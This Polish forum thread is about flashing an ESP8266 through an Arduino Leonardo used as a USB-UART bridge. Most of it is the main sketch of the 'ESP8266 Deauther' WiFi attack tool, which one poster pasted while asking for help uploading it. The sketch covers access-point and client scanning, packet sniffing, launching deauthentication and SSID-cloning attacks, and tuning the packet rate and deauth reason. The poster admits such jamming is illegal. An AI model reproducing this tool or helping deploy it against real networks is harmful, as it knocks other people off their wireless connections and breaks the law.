Skocz do zawartości

Programowanie ESP8266 za pomocą Arduino Leonardo


magik00

Pomocna odpowiedź

No nie taki brak, jakieś podstawy znam, zrobiłem robota sterowanego przez bluetooth z telefonu, a konwertera na mieście u mnie nie ma. Na botlandzie na razie nie będę nic zamawiał, bo zamawiałem ostatnio i zapomniałem tylko o tym konwerterze...

Link do komentarza
Share on other sites

No to napisz skecz, który będzie odczytywał dane z seriala usb i wysyłał je na tego na pinach i odwrotnie. Wtedy będziesz mógł uzywać swojego leonardo jak takiego konwertera, tylko ze stałą prędkością.

Link do komentarza
Share on other sites

Zarejestruj się lub zaloguj, aby ukryć tę reklamę.
Zarejestruj się lub zaloguj, aby ukryć tę reklamę.

jlcpcb.jpg

jlcpcb.jpg

Produkcja i montaż PCB - wybierz sprawdzone PCBWay!
   • Darmowe płytki dla studentów i projektów non-profit
   • Tylko 5$ za 10 prototypów PCB w 24 godziny
   • Usługa projektowania PCB na zlecenie
   • Montaż PCB od 30$ + bezpłatna dostawa i szablony
   • Darmowe narzędzie do podglądu plików Gerber
Zobacz również » Film z fabryki PCBWay

Użyłem tego kodu

/*
 USB/UART bride for Arduino Leonardo
 Originally written by Uli Koehler in 2015
 Published on techoverflow.net
 Revision 1.0
 Published under the public domain (CC 1.0 Universal)
*/
void setup() {
 // Adjust baudrate here
 const int baudrate = 115200;
 Serial.begin(baudrate);
 Serial1.begin(baudrate);
 //Wait until USB CDC port connects
 while (!Serial) {
 }
}
void loop() {
 //Copy byte incoming via TTL serial
 if (Serial1.available() > 0) {
  Serial.write(Serial1.read());
 }
 //Copy byte incoming via CDC serial
 if (Serial.available() > 0) {
  Serial1.write(Serial.read());
 }
}

Otworzyłem monitor portu szeregowego, wpisałem AT, moduł wifi nie odpowiada...

Połączyłem Tx arduino dzielnikiem do Rx modułu, Rx do Tx bezpośrednio, podałem modułowi 3.3V i klapa... Masy są połączone.

Link do komentarza
Share on other sites

Tak, 115200 to domyślna prędkość. Domyśliłem się, że ten sketch działa chyba jak należy, jak chcę zaprogramować płytkę muszę wybrać port arduino i mieć płytkę podłączoną pod Rx, Tx. GPIO0, GPIO15 podłączony do masy przez rezystor 10kOhm, CH_PD pod vcc 3,3V. Chciałem wgrać wifi deauther.

/*
 ===========================================
   Copyright (c) 2017 Stefan Kremser
       github.com/spacehuhn
 ===========================================
*/

#include <Arduino.h>

#include <ESP8266WiFi.h>
#include <ESP8266WebServer.h>
#include <FS.h>

#define resetPin 4 /* <-- comment out or change if you need GPIO 4 for other purposes */
//#define USE_DISPLAY /* <-- uncomment that if you want to use the display */
//#define USE_LED16 /* <-- for the Pocket ESP8266 which has a LED on GPIO 16 to indicate if it's running */

#ifdef USE_DISPLAY
 #include <Wire.h>

 //include the library you need
 #include "SSD1306.h"
 //#include "SH1106.h"

 //create display(Adr, SDA-pin, SCL-pin)
 SSD1306 display(0x3c, 5, 4); //GPIO 5 = D1, GPIO 4 = D2
 //SH1106 display(0x3c, 5, 4);

 //button pins
 #define upBtn 12 //GPIO 12 = D6
 #define downBtn 13 //GPIO 13 = D7
 #define selectBtn 14 //GPIO 14 = D5
 #define displayBtn 0 //GPIO 0 = FLASH BUTTON

 //render settings
 #define fontSize 8
 #define rowsPerSite 8

 int rows = 3;
 int curRow = 0;
 int sites = 1;
 int curSite = 1;
 int lrow = 0;

 bool canBtnPress = true;
 int buttonPressed = 0; //0 = UP, 1 = DOWN, 2 = SELECT, 3 = DISPLAY
 bool displayOn = true;
#endif

String wifiMode = "";
String attackMode = "";
String scanMode = "SCAN";

bool warning = true;

extern "C" {
 #include "user_interface.h"
}

ESP8266WebServer server(80);

#include <EEPROM.h>
#include "data.h"
#include "NameList.h"
#include "APScan.h"
#include "ClientScan.h"
#include "Attack.h"
#include "Settings.h"
#include "SSIDList.h"

/* ========== DEBUG ========== */
const bool debug = true;
/* ========== DEBUG ========== */

NameList nameList;

APScan apScan;
ClientScan clientScan;
Attack attack;
Settings settings;
SSIDList ssidList;

void sniffer(uint8_t *buf, uint16_t len) {
 clientScan.packetSniffer(buf, len);
}

#ifdef USE_DISPLAY
void drawInterface() {
 if(displayOn){
  display.clear();

  int _lrow = 0;
  for (int i = curSite * rowsPerSite - rowsPerSite; i < curSite * rowsPerSite; i++) {
   if (i == 0) display.drawString(3, i * fontSize, " --> WiFi " + wifiMode);
   else if (i == 1) display.drawString(3, i * fontSize, " --> " + scanMode);
   else if (i == 2) display.drawString(3, i * fontSize, " --> " + attackMode + " attack");
   else if (i - 3 <= apScan.results) {
    display.drawString(3, _lrow * fontSize, apScan.getAPName(i - 3));
    if (apScan.getAPSelected(i - 3)) {
     display.drawVerticalLine(1, _lrow * fontSize, fontSize);
     display.drawVerticalLine(2, _lrow * fontSize, fontSize);
    }
   }
   if (_lrow == lrow) display.drawVerticalLine(0, _lrow * fontSize, fontSize);
   _lrow++;
  }

  display.display();
 }
}
#endif

void startWifi() {
 Serial.println("\nStarting WiFi AP:");
 WiFi.mode(WIFI_STA);
 wifi_set_promiscuous_rx_cb(sniffer);
 WiFi.softAP((const char*)settings.ssid.c_str(), (const char*)settings.password.c_str(), settings.apChannel, settings.ssidHidden); //for an open network without a password change to: WiFi.softAP(ssid);
 Serial.println("SSID   : '" + settings.ssid+"'");
 Serial.println("Password : '" + settings.password+"'");
 Serial.println("-----------------------------------------------");
 if (settings.password.length() < 8) Serial.println("WARNING: password must have at least 8 characters!");
 if (settings.ssid.length() < 1 || settings.ssid.length() > 32) Serial.println("WARNING: SSID length must be between 1 and 32 characters!");
 wifiMode = "ON";
}

void stopWifi() {
 Serial.println("stopping WiFi AP");
 Serial.println("-----------------------------------------------");
 WiFi.disconnect();
 wifi_set_opmode(STATION_MODE);
 wifiMode = "OFF";
}

void loadIndexHTML() {
 if(warning){
  sendFile(200, "text/html", data_indexHTML, sizeof(data_indexHTML));
 }else{
  sendFile(200, "text/html", data_apscanHTML, sizeof(data_apscanHTML));
 }
}
void loadAPScanHTML() {
 warning = false;
 sendFile(200, "text/html", data_apscanHTML, sizeof(data_apscanHTML));
}
void loadStationsHTML() {
 sendFile(200, "text/html", data_stationHTML, sizeof(data_stationHTML));
}
void loadAttackHTML() {
 sendFile(200, "text/html", data_attackHTML, sizeof(data_attackHTML));
}
void loadSettingsHTML() {
 sendFile(200, "text/html", data_settingsHTML, sizeof(data_settingsHTML));
}
void load404() {
 sendFile(200, "text/html", data_error404, sizeof(data_error404));
}
void loadInfoHTML(){
 sendFile(200, "text/html", data_infoHTML, sizeof(data_infoHTML));
}
void loadLicense(){
 sendFile(200, "text/plain", data_license, sizeof(data_license));
}

void loadFunctionsJS() {
 sendFile(200, "text/javascript", data_functionsJS, sizeof(data_functionsJS));
}
void loadAPScanJS() {
 sendFile(200, "text/javascript", data_apscanJS, sizeof(data_apscanJS));
}
void loadStationsJS() {
 sendFile(200, "text/javascript", data_stationsJS, sizeof(data_stationsJS));
}
void loadAttackJS() {
 attack.ssidChange = true;
 sendFile(200, "text/javascript", data_attackJS, sizeof(data_attackJS));
}
void loadSettingsJS() {
 sendFile(200, "text/javascript", data_settingsJS, sizeof(data_settingsJS));
}

void loadStyle() {
 sendFile(200, "text/css;charset=UTF-8", data_styleCSS, sizeof(data_styleCSS));
}


void startWiFi(bool start) {
 if (start) startWifi();
 else stopWifi();
 clientScan.clearList();
}

//==========AP-Scan==========
void startAPScan() {
 scanMode = "scanning...";
#ifdef USE_DISPLAY
 drawInterface();
#endif
 if (apScan.start()) {

#ifdef USE_DISPLAY
  apScan.sort();
  rows = 3;
  rows += apScan.results;
  sites = rows / rowsPerSite;
  if (rows % rowsPerSite > 0) sites++;
#endif

  server.send ( 200, "text/json", "true");
  attack.stopAll();
  scanMode = "SCAN";
 }
}

void sendAPResults() {
 apScan.sendResults();
}

void selectAP() {
 if (server.hasArg("num")) {
  apScan.select(server.arg("num").toInt());
  server.send( 200, "text/json", "true");
  attack.stopAll();
 }
}

//==========Client-Scan==========
void startClientScan() {
 if (server.hasArg("time") && apScan.getFirstTarget() > -1 && !clientScan.sniffing) {
  server.send(200, "text/json", "true");
  clientScan.start(server.arg("time").toInt());
  attack.stopAll();
 } else server.send( 200, "text/json", "Error: no selected access point");
}

void sendClientResults() {
 clientScan.send();
}
void sendClientScanTime() {
 server.send( 200, "text/json", (String)settings.clientScanTime );
}

void selectClient() {
 if (server.hasArg("num")) {
  clientScan.select(server.arg("num").toInt());
  attack.stop(0);
  server.send( 200, "text/json", "true");
 }
}

void addClientFromList(){
 if(server.hasArg("num")) {
  int _num = server.arg("num").toInt();
  clientScan.add(nameList.getMac(_num));

  server.send( 200, "text/json", "true");
 }else server.send( 200, "text/json", "false");
}

void setClientName() {
 if (server.hasArg("id") && server.hasArg("name")) {
  if(server.arg("name").length()>0){
   nameList.add(clientScan.getClientMac(server.arg("id").toInt()), server.arg("name"));
   server.send( 200, "text/json", "true");
  }
  else server.send( 200, "text/json", "false");
 }
}

void deleteName() {
 if (server.hasArg("num")) {
  int _num = server.arg("num").toInt();
  nameList.remove(_num);
  server.send( 200, "text/json", "true");
 }else server.send( 200, "text/json", "false");
}

void clearNameList() {
 nameList.clear();
 server.send( 200, "text/json", "true" );
}

void editClientName() {
 if (server.hasArg("id") && server.hasArg("name")) {
  nameList.edit(server.arg("id").toInt(), server.arg("name"));
  server.send( 200, "text/json", "true");
 }else server.send( 200, "text/json", "false");
}

void addClient(){
 if(server.hasArg("mac") && server.hasArg("name")){
  String macStr = server.arg("mac");
  macStr.replace(":","");
  Serial.println("add "+macStr+" - "+server.arg("name"));
  if(macStr.length() < 12 || macStr.length() > 12) server.send( 200, "text/json", "false");
  else{
   Mac _newClient;
   for(int i=0;i<6;i++){
    const char* val = macStr.substring(i*2,i*2+2).c_str();
    uint8_t valByte = strtoul(val, NULL, 16);
    Serial.print(valByte,HEX);
    Serial.print(":");
    _newClient.setAt(valByte,i);
   }
   Serial.println();
   nameList.add(_newClient,server.arg("name"));
   server.send( 200, "text/json", "true");
  }
 }
}

//==========Attack==========
void sendAttackInfo() {
 attack.sendResults();
}

void startAttack() {
 if (server.hasArg("num")) {
  int _attackNum = server.arg("num").toInt();
  if (apScan.getFirstTarget() > -1 || _attackNum == 1 || _attackNum == 2) {
   attack.start(server.arg("num").toInt());
   server.send ( 200, "text/json", "true");
  } else server.send( 200, "text/json", "false");
 }
}

void addSSID() {
 if(server.hasArg("ssid") && server.hasArg("num")){
  int num = server.arg("num").toInt();
  if(num > 0){
   ssidList.addClone(server.arg("ssid"),num);
  }else{
   ssidList.add(server.arg("ssid"));
  }
  attack.ssidChange = true;
  server.send( 200, "text/json", "true");
 }else server.send( 200, "text/json", "false");
}

void deleteSSID() {
 ssidList.remove(server.arg("num").toInt());
 attack.ssidChange = true;
 server.send( 200, "text/json", "true");
}

void randomSSID() {
 ssidList._random();
 attack.ssidChange = true;
 server.send( 200, "text/json", "true");
}

void clearSSID() {
 ssidList.clear();
 attack.ssidChange = true;
 server.send( 200, "text/json", "true");
}

void resetSSID() {
 ssidList.load();
 attack.ssidChange = true;
 server.send( 200, "text/json", "true");
}

void saveSSID() {
 ssidList.save();
 server.send( 200, "text/json", "true");
}

void restartESP() {
 server.send( 200, "text/json", "true");
 ESP.reset();
}

void enableRandom(){
 attack.changeRandom(server.arg("interval").toInt());
 server.send( 200, "text/json", "true");
}

//==========Settings==========
void getSettings() {
 settings.send();
}

void saveSettings() {
 if (server.hasArg("ssid")) settings.ssid = server.arg("ssid");
 if (server.hasArg("ssidHidden")) {
  if (server.arg("ssidHidden") == "false") settings.ssidHidden = false;
  else settings.ssidHidden = true;
 }
 if (server.hasArg("password")) settings.password = server.arg("password");
 if (server.hasArg("apChannel")) {
  if (server.arg("apChannel").toInt() >= 1 && server.arg("apChannel").toInt() <= 14) {
   settings.apChannel = server.arg("apChannel").toInt();
  }
 }
 if (server.hasArg("ssidEnc")) {
  if (server.arg("ssidEnc") == "false") settings.attackEncrypted = false;
  else settings.attackEncrypted = true;
 }
 if (server.hasArg("scanTime")) settings.clientScanTime = server.arg("scanTime").toInt();
 if (server.hasArg("timeout")) settings.attackTimeout = server.arg("timeout").toInt();
 if (server.hasArg("deauthReason")) settings.deauthReason = server.arg("deauthReason").toInt();
 if (server.hasArg("packetRate")) settings.attackPacketRate = server.arg("packetRate").toInt();
 if (server.hasArg("apScanHidden")) {
  if (server.arg("apScanHidden") == "false") settings.apScanHidden = false;
  else settings.apScanHidden = true;
 }
 if (server.hasArg("beaconInterval")) {
  if (server.arg("beaconInterval") == "false") settings.beaconInterval = false;
  else settings.beaconInterval = true;
 }
 if (server.hasArg("useLed")) {
  if (server.arg("useLed") == "false") settings.useLed = false;
  else settings.useLed = true;
  attack.refreshLed();
 }
 if (server.hasArg("channelHop")) {
  if (server.arg("channelHop") == "false") settings.channelHop = false;
  else settings.channelHop = true;
 }
 if (server.hasArg("multiAPs")) {
  if (server.arg("multiAPs") == "false") settings.multiAPs = false;
  else settings.multiAPs = true;
 }
 if (server.hasArg("multiAttacks")) {
  if (server.arg("multiAttacks") == "false") settings.multiAttacks = false;
  else settings.multiAttacks = true;
 }

 if (server.hasArg("ledPin")) settings.ledPin = server.arg("ledPin").toInt();
 if(server.hasArg("macInterval")) settings.macInterval = server.arg("macInterval").toInt();

 settings.save();
 server.send( 200, "text/json", "true" );
}

void resetSettings() {
 settings.reset();
 server.send( 200, "text/json", "true" );
}

void setup() {

#ifdef USE_LED16
 pinMode(16, OUTPUT);
 digitalWrite(16, LOW);
#endif

 Serial.begin(115200);

 attackMode = "START";

 EEPROM.begin(4096);
 SPIFFS.begin();

 settings.load();
 if (debug) settings.info();
 nameList.load();
 ssidList.load();

 startWifi();
 attack.stopAll();
 attack.generate();

 /* ========== Web Server ========== */

 /* HTML */
 server.onNotFound(load404);

 server.on("/", loadIndexHTML);
 server.on("/index.html", loadIndexHTML);
 server.on("/apscan.html", loadAPScanHTML);
 server.on("/stations.html", loadStationsHTML);
 server.on("/attack.html", loadAttackHTML);
 server.on("/settings.html", loadSettingsHTML);
 server.on("/info.html", loadInfoHTML);
 server.on("/license", loadLicense);

 /* JS */
 server.on("/js/apscan.js", loadAPScanJS);
 server.on("/js/stations.js", loadStationsJS);
 server.on("/js/attack.js", loadAttackJS);
 server.on("/js/settings.js", loadSettingsJS);
 server.on("/js/functions.js", loadFunctionsJS);

 /* CSS */
 server.on ("/style.css", loadStyle);

 /* JSON */
 server.on("/APScanResults.json", sendAPResults);
 server.on("/APScan.json", startAPScan);
 server.on("/APSelect.json", selectAP);
 server.on("/ClientScan.json", startClientScan);
 server.on("/ClientScanResults.json", sendClientResults);
 server.on("/ClientScanTime.json", sendClientScanTime);
 server.on("/clientSelect.json", selectClient);
 server.on("/setName.json", setClientName);
 server.on("/addClientFromList.json", addClientFromList);
 server.on("/attackInfo.json", sendAttackInfo);
 server.on("/attackStart.json", startAttack);
 server.on("/settings.json", getSettings);
 server.on("/settingsSave.json", saveSettings);
 server.on("/settingsReset.json", resetSettings);
 server.on("/deleteName.json", deleteName);
 server.on("/clearNameList.json", clearNameList);
 server.on("/editNameList.json", editClientName);
 server.on("/addSSID.json", addSSID);
 server.on("/deleteSSID.json", deleteSSID);
 server.on("/randomSSID.json", randomSSID);
 server.on("/clearSSID.json", clearSSID);
 server.on("/resetSSID.json", resetSSID);
 server.on("/saveSSID.json", saveSSID);
 server.on("/restartESP.json", restartESP);
 server.on("/addClient.json",addClient);
 server.on("/enableRandom.json",enableRandom);

 server.begin();

#ifdef USE_DISPLAY
 display.init();
 display.flipScreenVertically();
 pinMode(upBtn, INPUT_PULLUP);
 pinMode(downBtn, INPUT_PULLUP);
 pinMode(selectBtn, INPUT_PULLUP);
 if(displayBtn == 0) pinMode(displayBtn, INPUT);
 else pinMode(displayBtn, INPUT_PULLUP);

 display.clear();
 display.setFont(ArialMT_Plain_16);
 display.drawString(0, 0, "ESP8266");
 display.setFont(ArialMT_Plain_24);
 display.drawString(0, 16, "Deauther");
 display.setFont(ArialMT_Plain_10);
 display.drawString(0, 40, "Copyright (c) 2017");
 display.drawString(0, 50, "Stefan Kremser");
 display.display();

 display.setFont(Roboto_Mono_8);

 delay(2000);
#endif

#ifdef resetPin
 pinMode(resetPin, INPUT_PULLUP);
 if(digitalRead(resetPin) == LOW) settings.reset();
#endif

 pinMode(settings.ledPin, OUTPUT);
 digitalWrite(settings.ledPin, HIGH);

 if(debug){
  Serial.println("\nStarting...\n");
#ifndef USE_DISPLAY
  delay(2000);
#endif
 }

}

void loop() {

 if (clientScan.sniffing) {
  if (clientScan.stop()) startWifi();
 } else {
  server.handleClient();
  attack.run();
 }

 if(Serial.available()){
  String input = Serial.readString();
  if(input == "reset" || input == "reset\n" || input == "reset\r" || input == "reset\r\n"){
   settings.reset();
  }
 }

#ifdef USE_DISPLAY

 if (digitalRead(upBtn) == LOW || digitalRead(downBtn) == LOW || digitalRead(selectBtn) == LOW || digitalRead(displayBtn) == LOW){
  if(canBtnPress){
   if(digitalRead(upBtn) == LOW) buttonPressed = 0;
   else if(digitalRead(downBtn) == LOW) buttonPressed = 1;
   else if(digitalRead(selectBtn) == LOW) buttonPressed = 2;
   else if(digitalRead(displayBtn) == LOW) buttonPressed = 3;
   canBtnPress = false;
  }
 }else if(!canBtnPress){
  canBtnPress = true;

  // ===== UP =====
  if (buttonPressed == 0 && curRow > 0) {
   curRow--;
   if (lrow - 1 < 0) {
    lrow = rowsPerSite - 1;
    curSite--;
   } else lrow--;

  // ===== DOWN ===== 
  } else if (buttonPressed == 1 && curRow < rows - 1) {
   curRow++;
   if (lrow + 1 >= rowsPerSite) {
    lrow = 0;
    curSite++;
   } else lrow++;

  // ===== SELECT ===== 
  } else if (buttonPressed == 2) {
   //WiFi on/off
   if (curRow == 0) {
    if (wifiMode == "ON") stopWifi();
    else startWifi();

   // ===== scan for APs ===== 
   } else if (curRow == 1) {
    startAPScan();
    drawInterface();

   // ===== start,stop attack ===== 
   } else if (curRow == 2) {
    if (attackMode == "START" && apScan.getFirstTarget() > -1) attack.start(0);
    else if (attackMode == "STOP") attack.stop(0);
   } 

   // ===== select APs ===== 
   else if (curRow >= 3) {
    attack.stop(0);
    apScan.select(curRow - 3);
   }
  }
  // ===== DISPLAY ===== 
  else if (buttonPressed == 3) {
   displayOn = !displayOn;
   display.clear();
   display.display();
  }
 }
 drawInterface();
#endif

}

Zainstalowałem bibliotekę esp8266 2.0, wybrałem płytkę ESP8266 12E, 4M flash, 115200bps. Podczas wgrywania występuje error :

Opcje projektu zmienione, przeładuj całość
Szkic używa 579830 bajtów (55%) pamięci programu. Maksimum to 1044464 bajtów.
Zmienne globalne używają 57192 bajtów (69%) pamięci dynamicznej, pozostawiając 24728 bajtów dla zmiennych lokalnych. Maksimum to 81920 bajtów.
warning: espcomm_sync failed
error: espcomm_open failed
error: espcomm_open failed

P.S. wiem, że zakłócanie sieci jest nielegalne, robię to z ciekawości, w imię nauki, nie szkodząc innej osobie 😉

Link do komentarza
Share on other sites

Zauważyłem, że przy próbie wgrania świeci się tylko dioda Rx, Tx świeci tylko czasem. Napisałem do autora kodu, przedstawiłem problem, kazał mi użyć nodemcu flashera i wgrać binke. I tu jest następny problem- trzeba wcześniej wgrać jakieś oprogramowanie na to esp? I czy wgrywanie tej binki traktować jako firmware update?

Link do komentarza
Share on other sites

Bądź aktywny - zaloguj się lub utwórz konto!

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto w ~20 sekund!

Zarejestruj nowe konto, to proste!

Zarejestruj się »

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się »
×
×
 • Utwórz nowe...

Ważne informacje

Ta strona używa ciasteczek (cookies), dzięki którym może działać lepiej. Więcej na ten temat znajdziesz w Polityce Prywatności.